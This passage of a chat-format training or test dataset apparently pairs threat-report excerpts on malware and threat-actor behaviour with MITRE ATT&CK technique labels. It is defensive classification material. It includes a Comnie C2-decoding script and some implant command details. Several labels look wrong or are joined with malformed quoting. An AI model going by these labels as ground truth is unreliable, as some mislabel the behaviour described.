- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking', 'T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Key takeaways: - TeamTNT is using new, open source tools to steal usernames and passwords from infected machines. The campaign has been active for approximately one month and is responsible for thousands of infections globally. Background . TeamTNT has been one of the most active threat groups since mid 2020. One of the most recent findings (June 4, 2021) came from Palo Alto researchers who discovered the TeamTNT Chimaera repository. TeamTNT C&C website showing infection statistics . Figure 2. The full list of supported programs can be found on the Lazagne page on Github. Windows module - persistence . Kubernetes root payload component . This component is mainly responsible for installing a cryptocurrency miner on infected devices, allowing the attacker to connect remotely to the system using SSH. Decoded shell script . TeamTNT IRC bot . As described previously this year by Lacework, TeamTNT includes ZiggyStartux in their IRC bot. IRC Bot available commands . TeamTNT AWS stealer . Similar to the other TeamTNT components, the AWS stealer (see figure 11) first installs missing dependencies. Conclusion . AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerPunch can use Base64-encoded scripts."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Volgmer variant is encoded using a simple XOR cipher."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has embedded a \"vmdetect.exe\" executable to identify virtual machines at the beginning of execution."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Both RATs provide a wide range of functionality on the target machine, ranging from collecting files, watching the screen, to capturing passwords and keystrokes. The RATs also enable the operator to remotely delete files, and spy on the computer user via the microphone or webcam"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can download a hosted \"beacon\" payload using BITSAdmin."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to send collected files over its C2."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can set persistence with a Registry run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used HTTPS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has executed HTA files via cmd.exe, and used batch scripts for collection."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 developed evasive techniques at a rapid pace. Throughout 2017, FIN7 was observed creating novel obfuscation methods, and in some cases modifying the methods on a daily basis while launching attacks targeting multiple victims. Their development of a payload obfuscation style using the Windows command interpreter's (cmd.exe) native string substitution was so unique that FireEye dubbed it \"FINcoding. These methods inspired deep command line obfuscation research and the release of Daniel Bohannon's Invoke-DOSfuscation. Reference Table 2 and Table 3 for a selection of samples and their associated command line obfuscation techniques"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShadowPad has discovered system information including memory status, CPU frequency, OS versions, and volume serial numbers."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055.011 - Process Injection: Extra Window Memory Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BabyShark has executed the \"tasklist\" command."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tools CTU researchers observed BRONZE UNION using the following tools in intrusions since the 2015 analysis, but clients should assume that the threat group still has access to the previously reported tools"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has targeted victims using spearphishing emails with malicious Microsoft Word attachments."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The legitimate application is a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations. When the Kaspersky application is run, it loads a file named msi.dll, which is located within the same directory. The XOR-decode process, which skips zeroes, uses the single-byte key 0x88"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Molerats used various implants, including those built with JS, on target machines."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SYSCON has the ability to use Tasklist to list running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This file is a USB file stealer which can be also guessed by its internal name \"USBgrabber.dll\". However, the implementation is sloppy which makes it a file stealer for any newly connected logical volume on a system. This is because the malware monitors the computer for messages WM_COMMAND and WM_DEVICECHANGE, but not verifying if a USB drive was connected"
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On balance, the fall campaigns diverged from Bulgarian themed NetWire campaigns in the early summer in scope and scale. These campaigns distributed NetWire variants which used Bulgarian email lures, leveraged geofencing, and downloading EXEs through certutils. The NetWire malware has been around since at least 2002 and has been consistently in use by various actors across the threat landscape. This analysis shows groupings of similar campaigns distributing NetWire based on message attributes, email lures and language, Office document metadata, VBA Macro code, and malware configuration"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor also creates a separate thread that installs a Windows hook procedure on message WH_KEYBOARD_LL, through which it can intercept keystrokes. We believe this is mainly used to intercept credentials from other browsers, specifically Google Chrome"
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally, each beacon is accompanied with a screenshot that is initially saved as ‘scr.jpg’ in the public directory and subsequently issued to the C2 using the same HTTP POST request as in the ‘uploadsf’ command"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker can enumerate files and directories just prior to encryption."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Over 80 files were sent to 40 email accounts within the organization, within the span of about an hour. The email contains Microsoft Excel attachments with malicious macros. When the file is opened, it loads in Microsoft Excel and urges the user to enable macros"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CVE-2018-4878 was the second most commonly observed vulnerability and is the only Adobe Flash Player vulnerability on this year’s top 10. Like CVE-2018-8174, this vulnerability was included in multiple exploit kits, most notably the Fallout exploit kit, which was used to distribute GandCrab ransomware. Fallout took its name and URI patterns from the now defunct Nuclear exploit kit, which had been associated with CVE-2015-7645, one of 2016’s top 10 vulnerabilities. In 2018, Fallout was last selling for $300 a week and $1,100 a month, as seen below."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution', 'T1588.005 - Exploits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nomadic Octopus executed PowerShell in a hidden window."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pony has attempted to lure targets into downloading an attached executable (ZIP, RAR, or CAB archives) or document (PDF or other MS Office format)."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The prior example decrypts to the following: mailto:121.126.211[.]94:8080;80;80 The following Python script may be used to decode the C2 data used by the newest Comnie variant: 12345678910111213141516171819202122232425262728293031323334353637383940 import base64import sysimport refrom string import maketransfrom struct import *import requestsdef rc4_crypt(data, key): S = range(256) j = 0 out = [] for i in range(256): j = (j + S[i] + ord( key[i % len(key)] )) % 256 S[i] , S[j] = S[j] , S[i] i = j = 0 for char in data: i = ( i + 1 ) % 256 j = ( j + S[i] ) % 256 S[i] , S[j] = S[j] , S[i] out.append(chr(ord(char) ^ S[(S[j] + S[i]) % 256])) return ''.join(out)def decode(data): o = \"\" for d in data: od = ord(d) o += chr((4 * (16 * od | od & 0xC) | (((od >> 4 | od & 0x30) >> 2))) & 0xFF) return obase64fixTable = maketrans(\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"[::-1], \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\");def trans(string): return str(string).translate(base64fixTable)def altdecode(string): return base64.b64decode(trans(string))req = requests.get(sys.argv[1])fd = req.textoriginal_data = re.search(\"magnet:/\\?([^\\?]+)\\?\", fd).group(1)parsed_data = altdecode(original_data)dataLength = unpack(\" (01-04 11-40-02).txt All the text files are now packed into the archive temp.zip (%temp%\\temp.zip) zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt txt is uploaded to the control server Additional Commands and Capabilities The service-based DLL implant traverses to the /htdocs/ directory on the FTP server and looks for any files with the keywords: TO EVERYONE: Commands issued to all infected endpoints TO : Commands issued to endpoints matching the ComputerName The following commands are supported by the malware implant: cmd /c pull : Adds filename to temp.zip, Base64 encodes, and uploads to control server cmd /c chip : Deletes current ipnet.ini config file"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1560 - Archive Collected Data', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer can establish persistence by creating a scheduled task."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used \"cmd.exe\" to execute commands on remote machines."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Audit ISAPI filters and search for web shells on Microsoft Exchange servers"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic has used scheduled tasks to add persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLAINTEE uses \"reg add\" to add a Registry Run key for persistence."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "service-based DLL implant can execute a downloaded file with parameters specified using CreateProcessAsUser."
- },
- {
- "role": "assistant",
- "content": "T1546.009 - Event Triggered Execution: AppCert DLLs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire contains modules that can discover and exploit unquoted path vulnerabilities."
- },
- {
- "role": "assistant",
- "content": "T1574.009 - Hijack Execution Flow: Path Interception by Unquoted Path"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors have been known to use the Sticky Keys replacement within RDP sessions to obtain persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.008 - Event Triggered Execution: Accessibility Features"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has accessed internet-facing identity providers such as Azure Active Directory and Okta to target specific organizations."
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Checking for specific keyboards and languages is a known evasion tactic meant to avoid running on analysis systems not configured, as the actor’s targeted victim would be configured"
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has exploited CVE-2019-19781 for Citrix, CVE-2019-11510 for Pulse Secure VPNs, CVE-2018-13379 for FortiGate VPNs, and CVE-2019-9670 in Zimbra software to gain access. They have also exploited CVE-2020-0688 against the Microsoft Exchange Control Panel to regain access to a network."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMess can identify domain group membership for the current user."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can pass the hash to authenticate via SMB."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CreepySnail can use stolen credentials to authenticate on target networks."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro has the ability to use HTTP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As we mentioned, the Bad Rabbit ransomware encrypts a victim’s files and disk. Files are encrypted with the following algorithms"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For FunnyDream, the threat actors used a modified version of the open source PcShare remote administration tool."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Green Lambert has encrypted strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once decrypted, we are provided with a large list of strings, as seen below (note that the data has been truncated for brevity): Figure 12 Decrypted strings from embedded BMP file After these strings are decrypted, the malware will load a series of Microsoft Windows API calls to be used later on"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel for Linux uses RC4 for encrypting the configuration."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: Dell SecureWorks) In SWCs analyzed by CTU researchers, the threat actors added the Dean Edwards packed JavaScript code shown in Figure 9 to the end of a legitimate website's menu page"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. The C2 server will respond to the Trojan’s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSInfo discovers the current domain information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For the investigators at NCC Group and Fox-IT these pieces of evidence supported the hypothesis of the adversary achieving credentials access by brute force, and more specifically by credential stuffing or password spraying"
- },
- {
- "role": "assistant",
- "content": "T1589.001 - Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has deployed multiple web shells on compromised servers including SIMPLESEESHARP, SPORTSBALL, China Chopper, and ASPXSpy."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attack Flow and Exfiltration After injecting into the targeted processes, the modules continue their malicious activity through those processes"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used several different keyloggers."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT34 has a tool called CANDYKING to capture a screenshot of user's desktop."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "digitally signed an executable with a stolen certificate from legitimate company AI Squared."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used WMIC for discovery as well as to execute payloads for persistence and lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used intercepter-NG to sniff passwords in network traffic."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-1314 actors mapped network drives using \"net use\"."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel can search for specific file extensions, including zipped files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
